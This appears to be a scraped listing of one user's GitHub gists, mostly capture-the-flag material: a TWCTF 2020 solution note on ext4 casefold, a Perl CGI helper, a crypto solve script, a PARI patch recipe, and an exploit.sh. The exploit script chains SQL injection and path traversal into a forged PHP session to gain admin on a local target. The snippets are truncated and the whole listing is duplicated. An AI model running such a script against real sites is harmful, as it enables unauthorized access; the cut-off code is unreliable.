ytoku

## twctf2020-nightmare.md

      
              1 file
            
          
              0 forks
            
          
              2 comments
            
          
              0 stars
            
          
                ytoku
                / twctf2020-nightmare.md
            
            
              Last active
              September 30, 2020 20:42
            
          
    TWCTF 6th 2020 "Does Linux Dream of Windows?" intended solution: Nightmare

Files on the server (except .aspx, .cs, .config) are case-insensitive.
But the server is Linux based. What's happening?
The answer is ext4 casefold feature.
settings:
mkfs.ext4 -O casefold /srv/www.img
mount /var/www


## !denylists

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                ytoku
                / !denylists
            
            
              Last active
              September 28, 2022 17:23
            
              
                denylists
              
          
              We couldn’t find that file to show.
              
            
## MyCGI.pm
use strict;
use warnings;
use CGI;
use base 'Exporter';
our @EXPORT = qw(handle tohex);

sub tohex {
	my $s = shift;
	$s =~ s/(.)/unpack("H*", $1) . " "/sge;
	$s;

## exploit.sh
TARGET_URL=http://localhost:10080
PASSWORD=''
HASHED_PASSWORD=$(echo -n $PASSWORD | sha1sum | awk '{print $1}')

COOKIEFILE=$(mktemp)
SESSFILE=$(mktemp)
echo -n 'user|s:1:"a";admin|b:1;' > $SESSFILE

curl -s -c $COOKIEFILE "$TARGET_URL/login.php" -d "signin=&password=$PASSWORD&user=') AND 0 UNION SELECT '', '$HASHED_PASSWORD', '', 0 -- /../../../../../var/lib/php5/sess_" >/dev/null
curl -s -b $COOKIEFILE "$TARGET_URL/index.php?page=settings" -F "file=@$SESSFILE" >/dev/null

## solve-whole.py
# -*- coding:utf-8 -*-
from Crypto.Util.number import *

def sqrt(x, n):
    return pow(x, (n+1)/4, n)

A = 2**127 - 1
B = 2**521 - 1
M = 2**607 - 1
n = 63818680202675589216815967315756339566489246779116223051722243409259352306082269405584940079271925323037734694881017657210693291225811959344097136283943773119253977386753351100049200282621303479907450098708525270143513533970091975470643256818850535284677109438825447301648598261836252545636152169068763895406856318437232759172916712871952129664784095465920918889209

## pari-2.7.4-hex.patch
How to patch and build

cd pari-2.7.4
patch -p1 < pari-2.7.4-hex.patch
bison -d src/language/parse.y -o src/language/parse.c
./Configure
make gp

==============
diff -Naru old/src/headers/paridecl.h new/src/headers/paridecl.h
	use strict;
	use warnings;
	use CGI;
	use base 'Exporter';
	our @EXPORT = qw(handle tohex);

	sub tohex {
	my $s = shift;
	$s =~ s/(.)/unpack("H*", $1) . " "/sge;
	$s;
	TARGET_URL=http://localhost:10080
	PASSWORD=''
	HASHED_PASSWORD=$(echo -n $PASSWORD \| sha1sum \| awk '{print $1}')

	COOKIEFILE=$(mktemp)
	SESSFILE=$(mktemp)
	echo -n 'user\|s:1:"a";admin\|b:1;' > $SESSFILE

	curl -s -c $COOKIEFILE "$TARGET_URL/login.php" -d "signin=&password=$PASSWORD&user=') AND 0 UNION SELECT '', '$HASHED_PASSWORD', '', 0 -- /../../../../../var/lib/php5/sess_" >/dev/null
	curl -s -b $COOKIEFILE "$TARGET_URL/index.php?page=settings" -F "file=@$SESSFILE" >/dev/null
	# -- coding:utf-8 --
	from Crypto.Util.number import *

	def sqrt(x, n):
	return pow(x, (n+1)/4, n)

	A = 2**127 - 1
	B = 2**521 - 1
	M = 2**607 - 1
	n = 63818680202675589216815967315756339566489246779116223051722243409259352306082269405584940079271925323037734694881017657210693291225811959344097136283943773119253977386753351100049200282621303479907450098708525270143513533970091975470643256818850535284677109438825447301648598261836252545636152169068763895406856318437232759172916712871952129664784095465920918889209
	How to patch and build

	cd pari-2.7.4
	patch -p1 < pari-2.7.4-hex.patch
	bison -d src/language/parse.y -o src/language/parse.c
	./Configure
	make gp

	==============
	diff -Naru old/src/headers/paridecl.h new/src/headers/paridecl.h